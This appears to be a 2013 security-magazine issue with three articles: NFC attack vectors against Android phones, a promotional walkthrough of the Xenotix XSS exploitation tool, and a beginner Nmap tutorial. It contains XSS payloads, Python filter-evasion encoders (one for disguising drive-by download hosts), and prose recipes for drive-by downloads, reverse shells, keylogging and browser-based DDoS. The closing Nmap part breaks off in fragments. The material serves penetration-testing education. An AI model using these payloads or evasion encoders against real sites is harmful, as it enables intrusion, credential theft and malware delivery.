
Issue36 – Jan2013 | Page - 1



Stand Close to Me & You're pwned! Owning Smart Phones using NFC

INTRODUCTION

Near Field Communication at a glance

What is NFC? NFC, or Near Field Communication, is a set of standards for communication between two devices that touch or are brought into close proximity (less than about 4 cm). The protocols build on RFID standards, including ISO 14443, and are defined and extended by the NFC Forum, founded in 2004 by Sony, Nokia, Philips, Samsung and other companies. The carrier frequency is 13.56 MHz (+/- 7 kHz). The very short range and modest data rates mean the radio needs little power, which makes it easy to integrate into portable devices without a large battery cost.

Types of Communication There are basically two modes of communication between NFC devices:

1. Passive: unpowered NFC "tags" are read by an NFC-enabled device. The initiator (the NFC device) generates the RF field that powers the tag, and the tag answers by modulating that field with its stored data.

2. Active: both devices generate their own RF field and take turns transmitting, which amounts to a peer-to-peer (P2P) link. Binary and multimedia files can be transferred this way with ease.



NFC Stack

Figure 1 – Protocol Layout of NFC Stack

The above figure (Fig. 1) shows the basic protocol layout of the NFC Stack.

For the purpose of this report we will discuss mainly the Protocol Layer of this stack, which covers the physical aspects of starting a communication, and the Application Layer, which covers how data is formatted and transmitted once the communication is up.

The Protocol Layer There are basically six divisions at the protocol layer. We will discuss the four major ones: Type 1 (Topaz), MIFARE Classic, MIFARE Ultralight and LLCP (P2P).

TYPE 1 (TOPAZ) Type 1 tags use a format sometimes called the Topaz protocol. It uses a simple memory model which is either static, for tags with less than 120 bytes of memory, or dynamic for tags with larger memory. Bytes are read from and written to the tag using commands such as RALL, READ, WRITE-E, WRITE-NE, RSEG, READ8, WRITE-E8 and WRITE-N8.

MIFARE CLASSIC MIFARE Classic tags are storage devices with simple security mechanisms for access control. They use an NXP proprietary security protocol (Crypto-1) for authentication and ciphering. This cipher was reverse engineered in 2007 and practical key-recovery attacks followed in 2008, so MIFARE Classic keys cannot be relied on to protect the stored data or to prove that a card is genuine.

MIFARE ULTRALIGHT These tags are similar to Topaz tags. They have a static memory layout when they have less than 64 bytes available and a dynamic layout otherwise. The first 16 bytes of memory contain metadata such as the serial number, the lock (access-rights) bytes and the capability container; the rest is for the actual data. Data is accessed using READ and WRITE commands. Plain Ultralight tags have no authentication at all, so anyone in range can read them and, unless the lock bits are set, rewrite them.

LLCP (P2P) The previous protocol layers all have initiators and targets, and the protocols are designed around the initiator being able to read from and write to the target. Logical Link Control Protocol (LLCP) is different because it establishes communication between two peer devices.

NFC Application Layer This layer is concerned with the format in which data is exchanged between NFC devices, or between an NFC device and a tag. NFC uses NDEF, the NFC Data Exchange Format, standardized by the NFC Forum: a simple binary message format made of one or more records, each carrying a type (text, URI, MIME data and so on) and a payload. Because NDEF is so central to NFC, here is a worked "text" record. On a tag the message is wrapped in a TLV block: 0x03 marks an NDEF message and 0xFE terminates the data area.

03 17 D1 01 13 54 02 65 6E 68 65 6C 6C 6F
20 63 6C 75 62 68 61 63 6B 20 21 FE

Decoding the bytes from the above example:

03 - NDEF message TLV
17 - TLV length: the message is 23 bytes
D1 - record header: MB, ME and SR set, TNF = 1 ("NFC Forum well-known type")
01 - length of the type field, here 1
13 - length of the payload, here 19 bytes
54 - type, here "T", which is text
02 - status byte: UTF-8 encoding, language code length 2
65 6E - language code, here "en"
68 65 ... 21 - the text "hello clubhack !"
FE - terminator TLV

The example above has a single byte devoted to the payload length. To support payloads longer than 255 bytes, a longer form of record header is used in which the payload length occupies 4 bytes. You can tell which variant to expect by whether the SR (Short Record) bit is set in the first byte of the record. A parser must check both length fields against the bytes actually present; mismatched lengths are the classic way to make a careless NDEF parser read out of bounds.
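To make the record layout concrete, here is a small NDEF decoder and encoder in Python, added for this article (it is not code from the original or from any NFC library). It walks the tag's TLV wrapper, handles both the SR and the 4-byte payload-length form, interprets Text and URI records, and refuses records whose length fields do not match the bytes present. The input dump is the one decoded by hand above; the URI prefix table is the subset of NFC Forum URI RTD codes needed here.

```python
"""NDEF decoder/encoder for the data area of an NFC tag.

Added example, not code from the original article or from an NFC library.
Handles the TLV wrapper (0x03 = NDEF message, 0xFE = terminator), short
(SR, 1-byte) and long (4-byte) payload lengths, and the well-known Text
("T") and URI ("U") records; every length is checked before it is used.
"""
from dataclasses import dataclass

# Subset of the NFC Forum URI RTD identifier codes (byte 0 of a "U" payload).
URI_PREFIXES = {0x00: "", 0x01: "http://www.", 0x02: "https://www.",
                0x03: "http://", 0x04: "https://", 0x05: "tel:", 0x06: "mailto:"}

class NdefError(ValueError):
    """Structurally invalid NDEF data (bad flags, lengths past the end, ...)."""

@dataclass
class Record:
    tnf: int            # Type Name Format; 1 = NFC Forum well-known type
    type: bytes         # e.g. b"T" (text) or b"U" (URI)
    payload: bytes
    short_record: bool  # True when the SR bit was set (1-byte payload length)

    def decoded(self):
        """Interpret well-known Text and URI payloads; anything else comes back raw."""
        if self.tnf == 1 and self.type == b"T":
            status = self.payload[0]            # bit 7: UTF-16, bits 0-5: language length
            lang_len = status & 0x3F
            encoding = "utf-16" if status & 0x80 else "utf-8"
            lang = self.payload[1:1 + lang_len].decode("ascii")
            return ("text", lang, self.payload[1 + lang_len:].decode(encoding))
        if self.tnf == 1 and self.type == b"U":
            return ("uri", URI_PREFIXES.get(self.payload[0], "") + self.payload[1:].decode("utf-8"))
        return ("raw", self.tnf, self.type, self.payload)

def parse_message(msg: bytes) -> list:
    """Parse the records of one NDEF message (the value of a 0x03 TLV)."""
    records, off = [], 0

    def take(n):                      # bounds-checked read of n bytes
        nonlocal off
        if off + n > len(msg):
            raise NdefError(f"need {n} byte(s) at offset {off}, only {len(msg) - off} left")
        chunk = msg[off:off + n]
        off += n
        return chunk

    while True:
        hdr = take(1)[0]
        mb, me, cf, sr, il = (hdr >> 7) & 1, (hdr >> 6) & 1, (hdr >> 5) & 1, (hdr >> 4) & 1, (hdr >> 3) & 1
        if not records and not mb:
            raise NdefError("first record does not carry the MB flag")
        if cf:
            raise NdefError("chunked records are not supported here")
        type_len = take(1)[0]
        payload_len = take(1)[0] if sr else int.from_bytes(take(4), "big")
        id_len = take(1)[0] if il else 0
        rtype = take(type_len)
        take(id_len)                  # record ID, not needed here
        records.append(Record(hdr & 0x07, rtype, take(payload_len), bool(sr)))
        if me:
            break
    if off != len(msg):
        raise NdefError(f"{len(msg) - off} trailing byte(s) after the ME record")
    return records

def parse_tag_memory(data: bytes) -> list:
    """Walk the TLV blocks of a tag's data area and decode the first NDEF message."""
    off = 0
    while off < len(data):
        tag = data[off]
        off += 1
        if tag == 0x00:               # NULL TLV: one padding byte, no length
            continue
        if tag == 0xFE:               # Terminator TLV
            break
        if off >= len(data):
            raise NdefError("TLV length byte missing")
        length = data[off]
        off += 1
        if length == 0xFF:            # 3-byte length form, values of 255 bytes or more
            length = int.from_bytes(data[off:off + 2], "big")
            off += 2
        value = data[off:off + length]
        if len(value) != length:
            raise NdefError(f"TLV claims {length} bytes but only {len(value)} remain")
        off += length
        if tag == 0x03:
            return parse_message(value)
    raise NdefError("no NDEF message TLV found")

def build_record(rtype: bytes, payload: bytes, force_long: bool = False) -> bytes:
    """Encode a one-record message: MB and ME set, TNF = 1, SR unless forced long."""
    sr = len(payload) < 256 and not force_long
    hdr = 0xC0 | (0x10 if sr else 0x00) | 0x01
    length = bytes([len(payload)]) if sr else len(payload).to_bytes(4, "big")
    return bytes([hdr, len(rtype)]) + length + rtype + payload

# The dump decoded by hand above: one short Text record, language "en".
ARTICLE_DUMP = bytes.fromhex("03 17 D1 01 13 54 02 65 6E 68 65 6C 6C 6F 20 63 6C 75 62 68 61 63 6B 20 21 FE")
```

`parse_tag_memory(ARTICLE_DUMP)[0].decoded()` returns `('text', 'en', 'hello clubhack !')`. Flip the payload-length byte (offset 4, 0x13) to 0x40 and the parser raises `NdefError` instead of reading past the message, which is exactly the class of input an NDEF fuzzer generates; `build_record(b"U", b"\x01example.com", force_long=True)` produces the 4-byte-length variant so the long form can be tested too.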



Android NFC Stack Our scope will be limited to Android based NFC devices.

Figure 2

The above figure shows the different libraries present in the Android NFC stack, which can be divided into three components: the kernel, the NFC service, and the tag (or peer device) itself. The kernel contains the driver for the NFC controller (on the devices considered here the NXP PN544, whose firmware ships as libpn544_fw.so); it handles the raw NFC signalling. The NFC service on the device is the application com.android.nfc. It relies on three main native components: libnfc.so, libnfc_jni.so and libnfc_ndef.so, divided according to which part of the NFC data each handles (JNI bridging, NDEF parsing, and so on).

Figure 3

So, in a real scenario, once a tag (or other NFC-enabled device) is brought close to an Android NFC device, the kernel driver hands the data up to the NFC service. The service receives the NFC data and sorts it into the proper categories before dispatching it. The most interesting part of all is libnfc_ndef.so, which is responsible for parsing NDEF. So if we want to fuzz the NFC stack, we would be modifying the NDEF data: changing bytes of the payload, or changing the value of the length fields, all of which live in the NDEF message itself. A tag (or a phone in P2P mode) is all that is needed to deliver such input, and the receiving phone parses it before any user interaction.

NFC ATTACK SURFACE

Common NFC based Attack Vectors

ATM Card Skimmers In countries where bank cards are NFC enabled, the cards can be used to complete transactions using the NFC functionality. Once the card comes within range of the NFC reader, the reader retrieves some of the information from the card and uses it to complete the payment.

What an attacker could do in this scenario is install a custom NFC reader in any of the ATMs which accept NFC-enabled cards. Once a user goes to the ATM and uses an NFC-enabled card, the attacker's reader would retrieve the information and then pass it on to the original reader, so this is a form of Man in the Middle attack. At the end of the day the attacker could come back to the ATM, take away the installed reader, and collect the information of all the cards used on that ATM that day. He could then use that card information to perform fraudulent transactions. The data a contactless card gives up without authentication is limited (typically the card number and expiry, not the PIN or CVV), but it is enough for card-not-present fraud wherever the merchant does not check those values.

NFC Poster Skimming Another attack vector involves NFC-enabled POSTERS. Such posters carry advertising: when an NFC-enabled phone is tapped at the marked spot on the poster, the embedded tag transfers information, usually a URL. For example, we came across an NFC-enabled poster advertising a newly released track by a famous artist at Chicago International Airport. When I tapped my Galaxy S3 on that poster I was redirected to a signup form, and on completing it I was able to download the trailer of the music video.

Figure 4

A phone is where most of our private information is stored. Since the phone opens the URL from the tag without asking, an attacker who replaces or overlays the tag with his own can send every visitor to a page that pushes an application or an exploit to the device, thereby compromising its security. Tags that are not write-locked can simply be rewritten in place.

NFC Relay Attack This form of attack threatens every organization that relies on NFC cards as proof of identity for customers or employees. Take the company-issued ID card we use to get into the building: an active device can read the data from the passive card and store it, thereby becoming a clone of the card. Now, instead of swiping the card, we can present the phone holding the copied data: ACCESS GRANTED!

Figure 5

Strictly speaking, what is described above is cloning; a relay attack proper forwards the reader's challenges to the genuine card in real time over another channel, which also defeats cards that cannot be copied because they keep a secret key. Either way the outcome for the building is the same. That is the company's security at risk; on the personal side, an NFC-enabled credit or debit card can cause enough damage. Even without stealing the card, its data is transferred whenever an active device comes close enough: a harmless bump against a stranger on a busy street is enough for a reader in his pocket to pull whatever the card exposes without authentication, and with it your bank balance is at risk.



LEVERAGING NFC FOR ANDROID BASED VULNERABILITY

NFC AWARE ANDROID MALWARE? For well-known type tags, the matching application is launched directly instead of the generic com.android.tag handler:

- a URL ("www" data) fires up the Browser
- a mailto: URI fires up the email client
- unexpected values in the NDEF message can crash NFCService.java

NFC Aware Malware Leveraging the NFC protocol, a new breed of NFC-aware malware can arise. Such malware registers itself as a handler for the NFC data and proxies the request through itself before the legitimate application is activated. One example is proxying any URL stored on an NFC tag: when the tag is parsed, the malware fires up instead of the Browser, can log or rewrite the URL, and only then hands it on, so the user still sees the expected page.

Figure 6

This application is hosted at the GitHub repo: https://github.com/subho007/HTTProxy

USSD Based Attack using NFC The well-known USSD vulnerability in Samsung Galaxy devices, which resets the complete device, can also be triggered through a simple NFC tag: the tag automatically opens the browser without any user interaction, the page dials the USSD code through a tel: link, and the dialer executes it, resetting the device to factory settings! (The issue was disclosed in September 2012 and has since been patched; an updated dialer displays the code and waits for the user instead of executing it.)

Figure 7




Subho Halder subho.halder@gmail.com Subho Halder is a programmer, security researcher and penetration tester. He programs in PHP, Java and Python and has a deep understanding of the Android and BlackBerry frameworks.

Aditya Gupta adityagupta1991@gmail.com Aditya Gupta is the co-founder of XY Securities, an information security firm based in India. His main expertise includes exploiting web applications, evading firewalls, breaking mobile security and exploit research. Aditya has been a frequent speaker at conferences including ClubHack, Nullcon, BlackHat and ToorCon.



Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

Introduction Cross Site Scripting, or XSS, vulnerabilities have been reported and exploited since the late 1990s. XSS was ranked second in the OWASP Top 10 web application risks for 2010.

Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications which allows an attacker to inject client-side script into web pages viewed by other users. The injected code executes on the client side, in the victim's browser, with the origin of the vulnerable site, so an attacker can use it to act within that origin despite the Same Origin Policy (SOP). In the past the potential of XSS was not appreciated: it was mainly used for stealing cookies and for temporary or permanent defacements and was not considered a high-risk vulnerability. Later, XSS tunneling and payload delivery showed what the bug can really do. Large websites like Google, Facebook, Twitter, Microsoft and Amazon continue to have XSS bugs reported against them.

Threats due to XSS

XSS Tunneling: with an XSS tunnel an attacker routes his own requests to the web server through the victim's browser, so they arrive carrying the victim's session.
Client side code injection: an attacker can inject malicious code and execute it on the client side.
DoS: an attacker can perform denial of service against a remote server or against the client itself.
Cookie Stealing: an attacker can obtain the session cookies or tokens of a victim (unless they are marked HttpOnly, which keeps them out of reach of script, though not of the requests the script makes).
Malware Spreading: an attacker can spread malware through a website which is vulnerable to XSS.
Phishing: an attacker can embed, or redirect to, a fake page of the website to capture the victim's login credentials.
Defacing: temporary or permanent defacement of the web application is possible.

Figure 1 - Top 10 Web Application Vulnerabilities OWASP

What is Xenotix XSS Exploit Framework? Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in web applications. It injects payloads into a web page parameter suspected of being vulnerable to XSS. It is basically a payload-list based XSS scanner and XSS exploitation kit. It gives the penetration tester the ability to test all the XSS payloads in the payload list against a web application to check for XSS vulnerabilities. The tool supports both a manual mode and an automated, timer-based test mode. The exploitation framework in the tool includes an XSS encoder, a victim-side XSS keystroke logger, an executable drive-by downloader and an XSS reverse shell. These exploitation tools help the penetration tester create proof of concept attacks on vulnerable web applications while writing a penetration test report.

Figure 2 - Xenotix XSS Exploit Framework

Need for a new Tool Many tools are available for detecting XSS vulnerabilities in web applications, but most of them are not easy to use or require you to specify XSS payloads manually. I found many penetration testers using just <script>alert('XSS')</script> or <script>alert(document.cookie)</script> as the proof of concept for a detected XSS vulnerability, which often fails to convince their clients that XSS is a severe threat. So I thought about a new, user-friendly tool with a payload list to test a web application for XSS and an XSS exploitation framework. After five months of research I built an XSS payload database of over 500 XSS payloads and implemented a tool in VB.NET: Xenotix XSS Exploit Framework.



Features of Xenotix XSS Exploit Framework

- Built-in XSS payloads
- Automated testing
- XSS keylogger
- XSS executable drive-by downloader
- XSS payload encoder
- XSS reverse shell
- XSS DDoSer
- XSS cookie thief

Built in Payload List The tool has an inbuilt XSS payload list of over 500 payloads, including HTML5-compatible XSS injection payloads. Most XSS filters are implemented with string replacement, htmlentities or htmlspecialchars. A string-replace blacklist misses case variations, alternative tags and event handlers; htmlspecialchars without ENT_QUOTES leaves single quotes untouched, so a payload that breaks out of a single-quoted attribute gets through; and neither helps when the value lands inside a script block or a URL attribute. Most of these weakly designed filters can be bypassed by specific payloads present in the inbuilt list.

Figure 3 - XSS Payload count in different Vulnerability Scanners

The above chart shows the number of XSS payloads in different XSS scanning tools on the market. By that count Xenotix XSS Exploit Framework has the second largest XSS payload list, after IBM AppScan, which the chart credits with 700 million payloads.

Automatic XSS Testing The tool has an automatic test mode based on a time interval. You specify the interval according to the time the web page takes to load, which depends on your bandwidth, and the tool tries the payloads one after another at that interval. With this feature automated XSS testing can be done; you do not have to check all 500+ payloads manually.

XSS Keylogger

Figure 4 - XSS Keylogger Working

The tool includes an inbuilt victim-side keylogger implemented in JavaScript and PHP. The PHP side is served by a portable PHP server, QuickPHP by Zach Saw. A JavaScript file is injected into the web application vulnerable to XSS and presented to the victim. The script captures the victim's keystrokes and sends them to a PHP file, which writes the logs to a text file.
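The following Python script, added here as an illustration and not Xenotix's code, shows what a payload-list scan does: it injects each payload into one query-string parameter, renders the page through one of three output filters of the kinds just described, and reports which payloads come back usable. The target page, its filters, the payload strings and the URL are all constructed for the example, so it runs offline.

```python
"""Payload-list reflected-XSS check against three output filters.

Added example, not Xenotix's code. The "server" is an in-process page
renderer constructed for the demo, so no network is involved; the payload
strings are illustrative rather than taken from the tool's list.
"""
import html
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# --- three output filters of the kinds discussed above ---------------------

def filter_replace(value: str) -> str:
    """Blacklist filter: strips the literal <script> tags, case-sensitively."""
    return value.replace("<script>", "").replace("</script>", "")

def filter_htmlspecialchars(value: str) -> str:
    """PHP htmlspecialchars() with its pre-8.1 default flags: & < > " encoded, ' left alone."""
    return html.escape(value, quote=False).replace('"', "&quot;")

def filter_escape_all(value: str) -> str:
    """htmlspecialchars($v, ENT_QUOTES): & < > " and ' all encoded."""
    return html.escape(value, quote=True)

# --- constructed vulnerable page -------------------------------------------

def render_page(term: str, filt, context: str) -> str:
    """Echo the parameter either into body text or into a single-quoted attribute."""
    safe = filt(term)
    if context == "body":
        return f"<p>Results for {safe}</p>"
    return f"<input type='text' value='{safe}'>"

# --- the scanner side --------------------------------------------------------

PAYLOADS = [
    "<script>alert(1)</script>",       # the textbook payload every filter catches
    "<ScRiPt>alert(1)</ScRiPt>",       # case variation beats a literal replace
    "<img src=x onerror=alert(1)>",    # no script tag at all
    "' onmouseover='alert(1)",         # breaks out of a single-quoted attribute
]

def inject(url: str, param: str, payload: str) -> str:
    """Return the URL with `param`'s value replaced by the payload (URL-encoded)."""
    parts = urlsplit(url)
    query = [(k, payload if k == param else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(query)))

def param_value(url: str, param: str) -> str:
    """What the server sees for `param` after decoding the query string."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))[param]

def usable(page: str, payload: str, context: str) -> bool:
    """Reflected verbatim and able to change the HTML in this context.
    In body text the payload must open a tag; in an attribute it must start
    with the quote that closes the attribute. (A simple heuristic for the
    demo; a real scanner inspects the DOM or executes the page.)"""
    if payload not in page:
        return False
    return payload.startswith("<") if context == "body" else payload.startswith("'")

def scan(url: str, param: str, filt, context: str) -> list:
    """Try every payload in `param` and return those that survive the filter."""
    hits = []
    for payload in PAYLOADS:
        page = render_page(param_value(inject(url, param, payload), param), filt, context)
        if usable(page, payload, context):
            hits.append(payload)
    return hits

URL = "http://www.site.com/search.php?id=1&term=about"   # constructed target
```

`scan(URL, "term", filter_replace, "body")` returns the mixed-case and the `<img onerror>` payloads, `scan(URL, "term", filter_htmlspecialchars, "attr")` returns only the attribute break-out, and `filter_escape_all` returns nothing in either context: the same payload list gives a different verdict per filter and per injection context, which is why a single `<script>alert(1)</script>` proof of concept says so little.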



XSS Executable Drive-by Downloader

Figure 5 - Executable Drive-by Downloader Working

A Java drive-by download can be implemented with Xenotix XSS Exploit Framework. It allows the attacker to download and run a malicious executable on the victim's system without his knowledge or permission. You specify the URL of the malicious executable, embed the drive-by page into the XSS-vulnerable page and serve it to the victim. When the victim views the injected page, the Java applet client.jar runs the command prompt and, using the echo command, writes a Visual Basic script named winconfig.vbs into the temp directory (%temp%); cmd.exe then starts winconfig.vbs. The script downloads the executable from the URL you specified into the temp directory, renames it update.exe, and finally executes it. The download and execution of the malicious executable happen without the victim noticing, provided the applet itself is allowed to run (see the note on the UAC prompt under the reverse shell below).

XSS Payload Encoder The inbuilt encoder allows encoding into different forms to bypass various filters and web application firewalls. The encoder supports Base64 encoding, URL encoding, hex encoding, HTML character conversion, character code conversion and IP to dword, hex and octal conversions.

XSS Reverse Shell

Figure 6 - Establishing a reverse shell by exploiting XSS in web applications.

An XSS reverse shell can be implemented with Xenotix XSS Exploit Framework, again with the help of the Java drive-by. When the injectable scripts generated by the XSS Reverse Shell module are served from the vulnerable web application to a victim, they initiate a drive-by download of a reverse TCP connecting shell. After the download, the reverse shell is executed by the same method used in the Java drive-by.
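As an added example (not Xenotix's implementation), here are the six conversions the encoder offers, written in Python so the output can be checked by hand. The JavaScript snippet and the IP address used as input are constructed.

```python
"""Encoders of the kind an XSS exploitation kit offers.

Added example written for this article, not Xenotix's implementation.
Each function rewrites a payload (or an attacker host address) into a form
that a naive string filter does not match but a browser still accepts.
"""
import base64
import ipaddress
from urllib.parse import quote


def b64_eval(js: str) -> str:
    """Deliver script as Base64 and decode it in the browser with atob()."""
    return f"eval(atob('{base64.b64encode(js.encode()).decode()}'))"


def url_encode(s: str) -> str:
    """Percent-encode every reserved character (letters, digits and _.-~ stay)."""
    return quote(s, safe="")


def js_hex(s: str) -> str:
    """JavaScript string-literal form with \\xHH escapes (use inside quotes)."""
    return "".join(f"\\x{ord(c):02x}" for c in s)


def html_decimal(s: str) -> str:
    """Numeric character references (&#NN;), decoded by the HTML parser in attributes."""
    return "".join(f"&#{ord(c)};" for c in s)


def char_code(js: str) -> str:
    """String.fromCharCode(...) form, which needs no quote characters at all."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in js) + ")"


def ip_forms(ip: str) -> dict:
    """Alternative spellings of an IPv4 address that browsers (and inet_aton) accept,
    handy for hiding the host part of a drive-by URL from a blacklist."""
    n = int(ipaddress.IPv4Address(ip))           # rejects anything that is not a dotted quad
    octets = [int(o) for o in ip.split(".")]
    return {
        "dword": str(n),                          # http://3232235521/
        "hex": "0x%08x" % n,                      # http://0xc0a80001/
        "octal": ".".join("0%o" % o for o in octets),         # http://0300.0250.00.01/
        "dotted_hex": ".".join("0x%02x" % o for o in octets),
    }
```

Which form works depends on where the payload lands: `html_decimal` output is only decoded inside HTML attributes, `js_hex` and `char_code` only inside a JavaScript string or expression, and `url_encode` is undone by the server before the filter ever runs, so it helps against a web application firewall that matches the raw query string but not against a filter in the application itself.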

Figure 6 - Establishing a reverse shell by exploiting XSS in web applications.



The advantage of this method is that the reverse shell is downloaded and executed on the victim's system without his knowledge; but to execute the reverse shell a UAC dialog pops up asking for permission to run the executable. The tool has an inbuilt listener for the reverse shell, designed to be easy to use: all you have to do is specify the reverse connection IP and port.

XSS DDoSer

Figure 7 - Distributed Denial of Service Attack with Xenotix XSS Exploit Framework

With HTML5 comes great power. We harness the power of HTML5, abusing Cross Origin Resource Sharing (CORS) and WebSocket, to implement a DDoS attack. WebSocket is a technology that gives web applications a bidirectional channel to a URI endpoint; sockets can send and receive data to and from a web server and react to the socket being opened or closed. XMLHttpRequest is a JavaScript object used to exchange data between a server and a browser behind the scenes, and it is what makes cross-origin requests under CORS. We can perform a combined and powerful DDoS attack by abusing these two technologies. This module abuses WebSocket by creating numerous socket connections to a target server to slow it down. Along with that, by abusing CORS, the add-on creates numerous GET requests to slow down the target server. When the first request to the target server returns without an 'Access-Control-Allow-Origin' header carrying a suitable value, the browser sometimes refuses to send more requests to the same URL; this is easily bypassed by making every request unique, adding a non-existent query-string parameter with a changing value. Every browser that executes the injected script becomes a participant, which is why an XSS bug on a high-traffic page is enough to assemble the attacking crowd.

XSS Cookie Thief It is the traditional cookie stealer, a bit more advanced and with a real-time cookie viewer. This module allows the pentester to create a cookie stealing POC.

Figure 8 - XSS Cookie Thief Console



Testing a website with Xenotix XSS Exploit Framework To test a website URL, say http://www.site.com/search.php?id=1&term=about, suppose you suspect that the variable 'term' is vulnerable to XSS. To test it in Xenotix XSS Exploit Framework you first specify the protocol, http or https. Then give the website URL without the suspected variable in the field after the protocol, and specify the suspected variable in the Variable to test field. Now select between Inbuilt XSS Payloads and Custom XSS payloads, and between Manual Mode and Auto Mode, to start testing.

Figure 9 - Testing a Website with Xenotix XSS Exploit Framework

Features for the Next Build The current version of Xenotix XSS Exploit Framework is based on Internet Explorer's rendering engine, Trident. Since XSS behaves slightly differently in different web browsers, support for the Gecko (used by Mozilla Firefox) and WebKit (used by Chrome, Opera and Safari) rendering engines will be added in the next build, as will support for XSS in POST parameters and XSS testing by modifying headers. An XSS proxy to tunnel the victim-server traffic will be added in a future build. Automatic detection of parameters or variables vulnerable to XSS, and DOM-based XSS detection, will be added in the next build.

Conclusion XSS in a popular website is a high security threat. Xenotix XSS Exploit Framework can be used by security analysts to perform penetration tests on web applications for XSS vulnerabilities and to create POCs with the inbuilt exploitation framework. Most security tools related to XSS are either XSS scanners or XSS exploitation tools; Xenotix XSS Exploit Framework is the first of its kind to act both as an XSS vulnerability scanner and as an XSS exploitation framework. Bug bounty programs such as the Google Vulnerability Reward Program, Facebook Bounty and the PayPal bug bounty are there, so go for XSS hunting and grab your bounty.




Ajin Abraham ajin25@gmail.com Ajin Abraham is an information security researcher currently doing his B.Tech in Computer Science. He is the creator of Xenotix XSS Exploit Framework and has published whitepapers and tools in the field of information security. His areas of interest include web application penetration testing, coding tools, exploit development and fuzzing.



SCAN YOUR HOME NETWORK WITH NMAP

Who should read this article? Everyone interested in computer security and computer networking should read this article.

Introduction If you run a network, small or big, you need a flexible and productive way to monitor it. You need to secure the machines connected to your network, especially if you have a Wi-Fi network. Monitoring the 'health' of your network is an important step in keeping attacks, viruses and malware out of your network perimeter. Ask yourself these questions: "Is there anybody outside using my wireless internet connection?", "Are my machines and devices secured?", "Is my router firewall working?", "Why is this port open? Is there a virus on my computer that opened that port?"

What is Nmap? Nmap is a free and open source tool for network discovery that helps us map the network. Network administrators find it very useful in their daily job, so if you are planning to be a network administrator you should learn how to use Nmap. Nmap can help us discover how many hosts are in a network, what operating systems they are running, what open ports they have and which services are running on those ports. It is a command line tool, but for those who do not like to remember many commands there is a graphical front end called Zenmap. Both Nmap and Zenmap are multi-platform (Linux, Windows, Mac OS X, BSD, etc.), so you do not have to worry about which operating system you need in order to use them. Nmap can save scan results to files (-oN for normal text, -oX for XML, -oG for greppable output) which we can use for later analysis. The thing I like most about Nmap is its scripting engine (NSE): we can write our own scripts and use them with Nmap.

Download and install Nmap

a) Installing Nmap on Ubuntu Installing Nmap on Ubuntu is very easy. Fire up the terminal and type "sudo apt-get install nmap" without the quotation marks. This simple command does everything; it downloads and installs Nmap for you. NOTE: on Linux, some scan types (SYN scan, OS detection, ARP and ICMP host discovery) need root privileges because they send raw packets, so run those with sudo. A plain connect scan works as an ordinary user.

b) Installing Nmap on Windows Download the latest self-installer from the official Nmap page (nmap.org) and double click it. After the installation is complete open the command prompt (cmd), type "cd C:\Program Files\Nmap" as shown in Figure 1 and hit enter. Type "nmap" as shown in Figure 2 and hit enter. This prints Nmap's usage: options and target specifications. So whenever we do not remember a command we can type "nmap" in the command prompt and read the output.

Scanning with Nmap Performing a simple scan with Nmap requires a target, specified as an IP address or a hostname. A simple scan does not require any options and its syntax is "nmap IP or HOSTNAME". My router is the target in this case; if you need another target, think about your own computer. Do not scan machines that are not yours.

Figure 1 – Simple nmap scan

The Nmap scan report tells us that the host is up and is running a web service on port 80, the port for HTTP (hypertext transfer protocol) traffic. A simple Nmap scan checks the 1000 most commonly used TCP ports and, based on how each port responds to the probe, classifies it into one of six port states: open, closed, filtered, unfiltered, open|filtered or closed|filtered. To perform a simple scan of your own machine type "nmap localhost" in the command prompt. (On Windows, Nmap cannot scan the loopback address with raw packets; scan your machine's real IP address instead.)

Can Nmap be used to scan multiple hosts? Yes. The easiest way is to string together the target IP addresses or hostnames separated by spaces, as shown in Figure 2.

Figure 2

Figure 2 demonstrates using Nmap to scan two addresses at the same time (host1 and host2). If the number of hosts is big, the scan will take more time and it is good to save the results to a file. Sometimes you want to scan an entire subnet, and for that you need some information about Classless Inter-Domain Routing (CIDR). I will not explain CIDR in this tutorial, so feel free to Google it. For now only remember that to scan an entire subnet you need an IP address in the subnet and the prefix length. The syntax is "nmap [IP/CIDR]". What is the value for your CIDR? To find out we will use an online subnet calculator. You can find it



here: http://www.subnetcalculator.com/. Put your IP address in the IP box and copy the number in the Mask Bits box. My CIDR is 24. You can also read it straight off your own machine: "ip addr" on Linux prints the address with its prefix (for example 192.168.1.5/24), and "ipconfig" on Windows shows the subnet mask, where 255.255.255.0 corresponds to /24. To scan the entire subnet we use this command: "nmap [IP/24]" without quotation marks. This process will take some time; the speed of the scan depends on how many hosts are up and how quickly they respond. If it is slow, feel free to get a coffee.

Figure 3

Nmap accepts text file input, so if you have a large number of machines to scan you can put the IP addresses in a text file and use it as input for Nmap. Entries in the file must be separated by a space, tab or new line. The syntax for this scan is "nmap -iL filename.txt", where the -iL parameter instructs Nmap to read the list of targets from filename.txt.

Figure 4

Figure 4 shows Nmap failing to open the input file hostlist.txt, a text file that contains a list of hosts. For this to work the file must be in the directory you run Nmap from (the Nmap folder, if you changed to it as above), or you must give its full path. By default, before scanning for open ports, Nmap checks whether a host is online and does not probe hosts that are not 'alive'. This saves time when scanning many machines. On your own LAN segment this check uses ARP requests, which hosts cannot ignore; for remote targets Nmap sends ICMP echo requests together with TCP probes to ports 80 and 443. The -sP option (spelled -sn in current Nmap releases; -sP still works) performs just this host discovery and is very useful when you want to see which hosts are online without scanning for open ports. To see which hosts are online in your network type "nmap -sP [IP/CIDR]" on the command line and wait for the output. Figure 5 shows that the 256 addresses in my subnet were probed and only three hosts are 'alive'.

Figure 5

Determining the operating system of your target is very important because many exploits are specific to a particular platform. The process of discovering the host operating system is called fingerprinting. The syntax for operating system detection is "nmap -O [IP or hostname]"; this needs root privileges and works best when the target has at least one open and one closed TCP port. Figure 10 shows the output of my OS detection scan.



Sometimes Nmap is unable to detect the operating system and it will provide only a fingerprint,but you can force the os detection by using the –osscan-guess option. But what is the reason that some port is closed or open? The – reason parameter helps us to understand the reason why a port is considered to be open or closed. Figure 6 shows how this option can be used.

open ports and from these open ports we are only interested about 22 and 80 ports.

Figure 7

As you can see from figure 7, we used -p 22,80 to perform a scan on TCP ports 22 and 80. Example 2 How can Nmap help me to discover FTP servers in my subnet? Figure 6

